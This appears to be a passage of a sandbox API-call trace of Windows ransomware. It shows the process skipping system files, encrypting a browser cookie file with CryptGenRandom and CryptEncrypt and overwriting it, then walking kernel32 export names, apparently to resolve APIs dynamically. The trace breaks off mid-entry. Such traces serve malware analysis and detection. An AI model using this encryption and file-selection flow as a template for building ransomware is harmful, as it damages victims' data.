[0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="bootsect.bak") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="ntuser.dat.log") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="thumbs.db") returned -1 [0181.004] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC", lpString2="Bootfont.bin") returned -1 [0181.004] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC") returned 44 [0181.004] lstrcmpiW (lpString1="QaHC", lpString2="lnk") returned 1 [0181.004] lstrcmpiW (lpString1="QaHC", lpString2="exe") returned 1 [0181.004] lstrcmpiW (lpString1="QaHC", lpString2="sys") returned -1 [0181.004] lstrcmpiW (lpString1="QaHC", lpString2="dll") returned 1 [0181.004] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0181.004] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC") returned 44 [0181.004] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0181.004] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC" [0181.004] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.004] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.QaHC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt.qahc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0181.004] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=374) returned 1 [0181.005] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0181.005] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0181.005] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0181.005] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0181.005] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.005] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0181.006] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0181.006] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.006] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0181.006] CloseHandle (hObject=0x280) returned 1 [0181.006] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.006] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0181.007] CloseHandle (hObject=0x0) returned 0 [0181.007] CloseHandle (hObject=0x27c) returned 1 [0181.007] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.008] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.008] GetTickCount () returned 0x1134b05 [0181.008] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0181.008] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0181.008] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0181.008] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0181.009] lstrlenA (lpString="kernel32.dll") returned 12 [0181.009] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0181.009] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.009] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.009] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.009] lstrlenA (lpString="ADDATOMA") returned 8 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.009] lstrlenA (lpString="ADDATOMW") returned 8 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.009] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.009] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.009] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.009] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.009] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.009] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.009] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.009] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.009] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.009] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.010] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.010] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.010] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.010] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.010] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.010] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.010] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.010] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.010] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.010] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.010] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.010] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.010] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.010] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.010] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.010] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.010] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.010] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.010] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.011] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.011] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.011] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.011] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.011] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.011] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.011] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.011] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.011] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.011] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.011] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.011] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.011] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.011] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.011] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.011] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.011] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.011] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.011] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.011] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.012] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.012] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.012] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.012] lstrlenA (lpString="BEEP") returned 4 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.012] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.012] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.012] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.012] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.012] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.012] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.012] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.012] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.012] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.012] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.012] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.012] lstrlenA (lpString="CANCELIO") returned 8 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.012] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.012] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.012] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.013] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.013] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.013] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.013] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.013] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.013] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.013] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.013] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.013] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.013] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.013] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.013] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.013] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.013] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.013] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.013] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.013] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.013] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.013] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.013] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.014] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.014] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.014] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.014] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.014] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.014] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.014] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.014] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.014] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.014] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.014] lstrcpyA (in: lpString1=0x36fce30, lpString2="CompareStringEx" | out: 